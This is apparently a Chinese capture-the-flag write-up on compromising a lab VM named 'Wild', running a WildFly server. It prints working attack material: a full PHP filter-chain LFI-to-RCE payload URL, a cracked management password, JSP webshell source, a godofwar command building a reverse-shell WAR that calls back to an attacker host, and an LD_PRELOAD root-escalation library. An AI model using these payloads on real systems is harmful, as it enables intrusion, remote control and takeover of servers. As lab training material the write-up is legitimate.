Wild靶机

nmap 发现:

nmap -p- -n 192.168.56.103 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-26 21:55 EST
Nmap scan report for 192.168.56.103
Host is up (0.0018s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy
8443/tcp open  https-alt
9990/tcp open  osm-appsrvr
MAC Address: 08:00:27:F0:BC:9C (Oracle VirtualBox virtual NIC)

目录扫描得到一个LFI,然后到RCE

这里要用到一个工具:https://github.com/synacktiv/php_filter_chain_generator

拿到一个payload放过来看看

http://192.168.56.103/recipe.php?file=php://filter/convert.i%2563onv.UTF8.CSISO2022KR|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.UTF8.UTF16|convert.i%2563onv.WINDOWS-1258.UTF32LE|convert.i%2563onv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.ISO2022KR.UTF16|convert.i%2563onv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.865.UTF16|convert.i%2563onv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CSA_T500.UTF-32|convert.i%2563onv.CP857.ISO-2022-JP-3|convert.i%2563onv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.IBM891.CSUNICODE|convert.i%2563onv.ISO8859-14.ISO6937|convert.i%2563onv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.UTF8.UTF16LE|convert.i%2563onv.UTF8.CSISO2022KR|convert.i%2563onv.UCS2.UTF8|convert.i%2563onv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CP861.UTF-16|convert.i%2563onv.L4.GB13000|convert.i%2563onv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CP869.UTF-32|convert.i%2563onv.MACUK.UCS4|convert.i%2563onv.UTF16BE.866|convert.i%2563onv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.JS.UNICODE|convert.i%2563onv.L4.UCS2|convert.i%2563onv.UCS-2.OSF00030010|convert.i%2563onv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.PT.UTF32|convert.i%2563onv.KOI8-U.IBM-932|convert.i%2563onv.SJIS.EUCJP-WIN|convert.i%2563onv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.ISO88597.UTF16|convert.i%2563onv.RK1048.UCS-4LE|convert.i%2563onv.UTF32.CP1167|convert.i%2563onv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.INIS.UTF16|convert.i%2563onv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.L5.UTF-32|convert.i%2563onv.ISO88594.GB13000|convert.i%2563onv.CP950.SHIFT_JISX0213|convert.i%2563onv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CP861.UTF-16|convert.i%2563onv.L4.GB13000|convert.i%2563onv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CP861.UTF-16|convert.i%2563onv.L4.GB13000|convert.i%2563onv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.INIS.UTF16|convert.i%2563onv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.L5.UTF-32|convert.i%2563onv.ISO88594.GB13000|convert.i%2563onv.CP950.SHIFT_JISX0213|convert.i%2563onv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.863.UNICODE|convert.i%2563onv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.ISO88597.UTF16|convert.i%2563onv.RK1048.UCS-4LE|convert.i%2563onv.UTF32.CP1167|convert.i%2563onv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.PT.UTF32|convert.i%2563onv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.JS.UNICODE|convert.i%2563onv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.SE2.UTF-16|convert.i%2563onv.CSIBM921.NAPLPS|convert.i%2563onv.855.CP936|convert.i%2563onv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.JS.UNICODE|convert.i%2563onv.L4.UCS2|convert.i%2563onv.UCS-2.OSF00030010|convert.i%2563onv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CSGB2312.UTF-32|convert.i%2563onv.IBM-1161.IBM932|convert.i%2563onv.GB13000.UTF16BE|convert.i%2563onv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.SE2.UTF-16|convert.i%2563onv.CSIBM1161.IBM-932|convert.i%2563onv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.PT.UTF32|convert.i%2563onv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.SE2.UTF-16|convert.i%2563onv.CSIBM1161.IBM-932|convert.i%2563onv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.SE2.UTF-16|convert.i%2563onv.CSIBM921.NAPLPS|convert.i%2563onv.855.CP936|convert.i%2563onv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.8859_3.UTF16|convert.i%2563onv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CP1046.UTF16|convert.i%2563onv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CP1046.UTF32|convert.i%2563onv.L6.UCS-2|convert.i%2563onv.UTF-16LE.T.61-8BIT|convert.i%2563onv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.MAC.UTF16|convert.i%2563onv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CSIBM1161.UNICODE|convert.i%2563onv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.INIS.UTF16|convert.i%2563onv.CSIBM1133.IBM943|convert.i%2563onv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.SE2.UTF-16|convert.i%2563onv.CSIBM1161.IBM-932|convert.i%2563onv.MS932.MS936|convert.i%2563onv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.base64-decode/resource=php://temp&1=phpinfo();

用antsword连上去看看:

tod:x:1002:1002:,,,:/home/tod:/bin/zsh

第一个flag可能就是要拿到这个 tod

8080端口的服务 WildFly

9990是它的管理页面,需要验证

gpt问一下

一开始还没搜到

后面搜到了在/opt下

然后读读你的看看

cat /opt/wildfly/domain/configuration/mgmt-users.properties
#
# Properties declaration of users for the realm 'ManagementRealm' which is the default realm
# for new installations. Further authentication mechanism can be configured
# as part of the <management /> in host.xml.
#
# Users can be added to this properties file at any time, updates after the server has started
# will be automatically detected.
#
# By default the properties realm expects the entries to be in the format: -
# username=HEX( MD5( username ':' realm ':' password))
#
# A utility script is provided which can be executed from the bin folder to add the users: -
# - Linux
#  bin/add-user.sh
#
# - Windows
#  bin\add-user.bat
#
#$REALM_NAME=ManagementRealm$ This line is used by the add-user utility to identify the realm name already used in this file.
#
# On start-up the server will also automatically add a user $local - this user is specifically
# for local tools running against this AS installation.
#
# The following illustrates how an admin user could be defined, this
# is for illustration only and does not correspond to a usable password.
#
administrator=3bfa7f34174555fe766d0e0295821742

爆破得到:

ManagementRealm
administrator=3bfa7f34174555fe766d0e0295821742
katarina9

用administrator 与 katarina9登录即可

是这个界面咯

这里有个上传war文件的上传点

不知道为啥上传恶意的一句话jsp 打包后的war包就是不行

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }

    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("ant");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

jar -cvf r.war .\r.jsp

明明都报毒了,但是一点就是连不上

对jsp真不熟吧!下次好好研究研究~

后面在看大佬是用了个工具GodOfWar,嗨嗨嗨,终究还是脚本小子咯!

Github地址:https://github.com/KINGSABRI/godofwar/

安装命令:gem install godofwar

然后直接生成一个反弹shell的war包即可:godofwar -p reverse_shell -H 192.168.56.102 -P 9999 -o wild

然后就是起一个监听,然后访问这个恶意的jsp文件,就能拿到shell咯

提权

劫持动态链接库,上传exp.so(学习~,二进制这个只能说听过,好像是在绕disable_function那儿?)

#include <stdio.h>       // printf 函数
#include <sys/types.h>   // 包含 setuid 和 setgid 函数所需类型
#include <unistd.h>      // 提供 setuid、setgid 和 system 函数
#include <stdlib.h>      // 提供 unsetenv 和 system 函数

void _init() {
    unsetenv("LD_PRELOAD"); // 清除 LD_PRELOAD 环境变量
    setgid(0);              // 设置 GID 为 0 (root)
    setuid(0);              // 设置 UID 为 0 (root)
    system("/bin/bash");    // 运行 Bash shell
}

编译命令:gcc -fPIC -shared -o exp.so exp.c -nostartfiles

下载恶意so文件后直接拿到root

最终得到两个flag:

c1cc7f5179a168ec93095695f20c9e3f
d8592e5a179d4b80e099f4c9a460c6e4